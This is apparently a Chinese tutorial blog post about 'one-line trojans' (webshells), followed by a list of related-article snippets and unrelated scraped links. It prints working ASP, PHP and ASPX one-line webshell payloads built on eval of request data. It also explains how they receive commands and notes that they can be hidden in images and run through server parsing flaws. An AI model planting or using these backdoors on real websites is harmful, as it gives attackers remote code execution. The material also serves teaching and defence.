一句话木马是如何被执行的?
一句话木马是如何被执行的
- 0x01 什么是一句话
- 0x02 最最典型的一句话小马
- 0x03 大马与小马
- 0x04 一句话小马是如何执行的呢
0x01 什么是一句话
一句话木马就是只需要一行代码的木马,短短一行代码,就能做到和大马相当的功能。为了绕过waf的检测,一句话木马出现了无数种变形,但本质是不变的:木马的函数执行了我们发送的命令。
0x02 最最典型的一句话小马
asp一句话:<%eval request("heroes")%>
php一句话: <?php @eval($_POST[value]);?>
aspx一句话:<%@ Page Language="Jscript"%><%eval(Request.Item["value"])%>
一句话木马短小精悍,格式千变万化,因为总是被waf拦截,所以一句话格式可以进行无数种变化绕过waf,可谓是道高一尺、魔高一丈!
0x03 大马与小马
小马特点:小马体积小,容易隐蔽,隐蔽性强,最重要的在于能与图片结合在一起上传之后可以利用Nginx或者iis6的解析漏洞来运行, 不过功能少,一般只有上传功能。
大马特点:大马体积大,一般在50k以上。功能多,一般都包括提权功能,磁盘管理,数据库连接,执行命令甚至有些具备自带提权功能和压缩,解压缩网站程序的功能。隐蔽性不好,而大多代码如果不加密的话容易被杀毒软件查杀。
0x04 一句话小马是如何执行的呢
我们可以通过GET 、POST 、COOKIE 这三种方式向一个网站提交数据,一句话木马用$ _GET[’ ‘]、$ _POST[’ ‘]、$ _COOKIE[’ '] 接收我们传递的数据,并把接收的数据 传递给一句话木马中执行命令的函数,进而执行命令。
所以看到的经典一句话木马大多都是只有两个部分,一个是可以执行代码的函数部分,一个是接收数据的部分。
就像是这样:<?php @eval($_POST['a']);?>执行命令的函数(接收的数据)
举个例子: <?php @eval($_POST['a']);?>
其中eval就是执行命令的函数,$_POST[‘a’]就是接收的数据。
eval函数把接收的数据当作php代码来执行。
这样我们就能够让插了一句话木马的网站执行我们传递过去的任意php语句。
这便是一句话木马的强大之处。
因为木马是接收post请求中 “a” 的数据( $_POST[‘a’]),所以我们必须以post方法发送数据并且将我们要执行的代码赋值给“a”。
如果把木马中的post替换成get,那么我么就需要以GET方法发送“a”,(就像这样: http://127.0.0.1/test.php?a=phpinfo(); )我就不再另行演示了。
一句话木马是如何被执行的?相关推荐
- 一句话木马绕过linux安全模式,一句话木马(webshell)是如何执行命令的
在很多的渗透过程中,渗透人员会上传一句话木马(简称webshell)到目前web服务目录继而提权获取系统权限,不论asp.php.jsp.aspx都是如此,那么一句话木马到底是如何执行的呢,下面我们就 ...
- php一句话木马调用cmd命令,一句话木马(webshell)是如何执行命令的
在很多的渗透过程中,渗透人员会上传一句话木马(简称webshell)到目前web服务目录继而提权获取系统权限,不论asp.php.jsp.aspx都是如此,那么一句话木马到底是如何执行的呢,下面我们就 ...
- 「渗透」:一句话木马反弹shell的思路
前提:现在情况是已经上传了一句话木马,可以执行命令如:ls,pwd,whoami等:问题在于,不管用python.bash还是perl都反弹不了,偷不了懒,就上msf把. http://target- ...
- php assert eval,代码执行函数之一句话木马
前言 大家好,我是阿里斯,一名IT行业小白.非常抱歉,昨天的内容出现瑕疵比较多,今天重新整理后再次发出,修改并添加了细节,另增加了常见的命令执行函数如果哪里不足,还请各位表哥指出. eval和asse ...
- 一句话木马使用方法总结
2019独角兽企业重金招聘Python工程师标准>>> "EASYNEWS新闻管理系统 v1.01 正式版"是在企业网站中非常常见的一套整站模版,在该网站系统的留 ...
- php 一句话木马简介
一句话木马就是一段简单的代码,就这短短的一行代码,就能做到和大马相当的功能.一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用. 一句话木马工作原理 <?php @ev ...
- java一句话木马连接_webshell一句话木马大全
比较全的webshell一句话包括ASP,PHP,ASPX,JSP asp一句话木马程序代码 程序代码 程序代码 程序代码 程序代码 程序代码 [code] [code] 程序代码 %> 程序代 ...
- php限制一个函数在几分钟内不被调用_在PHP一句话木马使用过程中的种种坑点分析...
前言 在平时的学习和练习过程中,经常会遇到上传的一句话木马无法执行我们的命令或者说能执行命令但是不能连接菜刀蚁剑等webshell管理工具,以及各个版本PHP所限制的一些一句话木马的写法,不同版本we ...
- 远程包含shell时,上传shell时所遇到一句话木马不能上传问题解决的办法(这里为单引号与双引号问题)
远程包含shell 需要allow_url_open=On,才可以尝试远程包含一句话木马: http://www.xxx.com/echo.txt, 代码如下. <?php fputs (fop ...
最新文章
- 疯狂python讲义视频 百度云-疯狂Python讲义 PDF高清版附源码
- Django中的常用命令
- [云炬创业管理笔记]第一章讨论3
- OpenCV消除傅立叶域中的周期性噪声的实例(附完整代码)
- hession调用json解析异常 com.caucho.hessian.io.HessianProtocolException: expected integer at 0x74 java.util
- IOS之Foundation之探究学习Swift实用基础整理一
- the sdk seems invalid._直播平台中必不可少的美颜SDK
- MongoDB 教程八(结语): 一网打尽当下NoSQL类型、适用场景及使用公司
- Kafka-与SpringBoot的集成
- 大数据分析平台有哪些业务分析思路
- 【软件开发规范一】《Java开发规范》
- C/C++ 电脑微信dat文件解密及工具分享
- cad中直径符号不显示_你知道在CAD制图软件中如何输入公差/直径符号吗?CAD入门学习技巧!...
- 大学计算机基础超详细知识点(高手总结),大学计算机基础超详细知识点(高手总结)免费-...
- 进程间的通信方式——pipe(管道)
- Linux网络管理员手册
- K8s9(2-1) k8s中的通信机制, kube-proxy的ipvs模式 ,无头服务,LoadBalancer,ExternalName,外部公有 ip(externalIPs)
- Android camera闪光灯
- 文本聚类平移算法的几点问题
- 「雷锋前线」那昕出任CEO,“什么值得买”会变吗
热门文章
- LibUsbDotNet2.2.29版本通过usb口,获取扫码盒子扫码数据,读取数据不全和不对
- 电商分析:网站运营不得不做的用户分析
- git命令学习笔记2(路飞学城)
- java计算机毕业设计高校毕业生就业满意度调查统计系统源码+系统+lw文档+mysql数据库+部署
- 炉石传说投弹机器人怎么获得_炉石传说砰砰计划战士新卡投弹机器人点评
- 你们都在哪里看股指期货的行情呢?
- 05 -描述统计学- Project 分析问卷数据
- VSCode 又酷又实用的多光标编辑
- html ip 黑名单,服务器ip黑名单查询
- 2022年自考专业(公关关系)公关关系策划练习题